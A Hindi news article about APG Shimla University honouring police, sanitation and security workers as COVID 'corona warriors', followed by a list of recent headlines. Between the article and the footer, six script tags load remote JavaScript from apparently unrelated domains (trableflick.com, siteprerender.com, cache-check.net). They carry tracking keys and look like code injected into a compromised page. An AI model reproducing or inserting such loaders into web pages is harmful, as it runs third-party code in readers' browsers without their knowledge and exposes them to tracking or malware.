Categories: हिमाचल

सोशल डिस्टेंसिंग का पालन करते हुए APG शिमला विश्वविद्यालय ने कोरोना वॉरियर्स को किया सम्मानित

<p>कोरोना वायरस से निपटने के लिए कोरोना वॉरियर, प्रशासन और सरकार दिन-रात लोगों की जान बचाने में जुटे हैं। ऐसे में इन कर्मवीर योद्धाओं को कई सामाजिक संस्थाओं, प्रशासन और सरकार द्वारा सम्मानित किया जा रहा है। इसी कड़ी में शनिवार को एपीजी शिमला विश्वविद्यालय प्रशासन ने एक बार फिर से ऐसे योद्धाओं को सम्मानित किया। एपीजी शिमला विश्वविद्याल प्रशासन की और से पुलिस थाना कसुम्पटी शिमला के पुलिस कर्मचारियों, एपीजी विश्वविद्याल के सफाई कर्मचारियों और सुरक्षा कर्मियों पर फूल बरसाकर सम्मानित किया गया। इस दौरान सोशल डिस्टेंसिंग का भी खास ध्यान रखा गया। एपीजी शिमला विश्वविद्याल की और से विश्वविद्यालय की लेखा व कार्यकारी अधिकारी जजतेंद्रजीत, कार्यकारी अधिकारी अफजल खान और पत्रकारिता एवं जनसंचार विभाग के डीन प्रोफेसर डॉ. रमेश चौहान और सभी विभागों के आचार्यों ने इन योद्धाओं को सम्मानित किया।</p>

<p>इस मौके पर एपीजी शिमला विश्वविद्यालय के कुलपति प्रोफेसर डॉ. आरके चौधरी ने इन योद्धाओं के सन्मान में कहा कि संकट के इस घड़ी में स्वास्थ्य विभाग, प्रशासन, सरकार, पुलिस, सुरक्षा कर्मी, सफाई कर्मचारी अपने-अपने दायित्व निर्वहन पूरी मेहनत और लगन के साथ लोगों के जीवन बचाने में सहयोग कर रहे हैं, हम सब घरों में हैं, लेकिन कोरोना योद्धा अपने-अपने काम पर हैं। ऐसे में उनका मनोबल बढ़ाने के लिए हम सभी लोगों का दायित्व बनता है। इसी को मध्यनजर रखते हुए एपीजी शिमला विश्वविद्यालय की ओर से योद्धाओं का सम्मान करना भी एक सामाजिक दायित्व है।</p>

<p>कुलपति चौधरी ने विश्वविद्यालय के अधिकारियों और आचार्यों के इस सामाजिक कार्य के लिए उनका धन्यवाद किया और कोरोना योद्धाओं के स्वस्थ और सुरक्षित जीवन की मंगल कामना की। वहीं, कुलपति ने एपीजी शिमला विश्वविद्याल के सफाई और सुरक्षा कर्मियों को विश्वविद्यालय की हमेशा स्वास्थ्य व्यवस्था बनाये रखने और विश्वविद्यालय कैंपस को सैननटीजड रखने के लिए उनका आभार जताया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_524221626&amp;key=21aca573d498d25317&amp;cv=1593264057&amp;t=1593264057530″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_245609000&amp;key=21aca573d498d25317&amp;cv=405734&amp;t=1593264057530″ type=”text/javascript”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1593264057535″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

अमेरिका की ध्रुवी पटेल के सिर सजा Miss India Worldwide का ताज

समाचार फर्स्‍ट एजेंसी Washington: अमेरिका में ‘कम्प्यूटर इन्फॉर्मेशन सिस्टम’ की छात्रा ध्रुवी पटेल को ‘मिस…

4 hours ago

27 या 28 सितंबर को इंदिरा एकादशी कब है? जानें

  Indira Ekadashi 2024 : हिंदू धर्म में आश्विन मास की पहली एकादशी व्रत का…

4 hours ago

दोपहर 12 बजे हिमाचल मंत्रिमंडल की बैठक: क्या होंगे प्रमुख निर्णय?

  Shimla:  राज्य मंत्रिमंडल की बैठक शुक्रवार दोपहर 12 बजे मुख्यमंत्री सुखविंदर सिंह सुक्खू की…

4 hours ago

आज का ज्योतिषीय प्रभाव

आज का राशिफल 20 सितम्बर 2024, शुक्रवार मेष🐐 (चू, चे, चो, ला, ली, लू, ले,…

4 hours ago

लेह-दिल्ली रूट पर एचआरटीसी की बस सेवा बंद, जून 2025 तक बहाल होगा रूट

  अब यात्रियों को मनाली-केलांग-लेह के बीच टैक्सियों में मंहगा सफर करना पड़ेगा Shimla :एचआरटीसी…

18 hours ago

चिकन की दुकानों में स्वच्छता के नियम दरकिनार

  Hamirpur:जिला खाद्य सुरक्षा विभाग द्वारा किए गए चिकन की दुकानों के निरीक्षण में स्वच्छता…

18 hours ago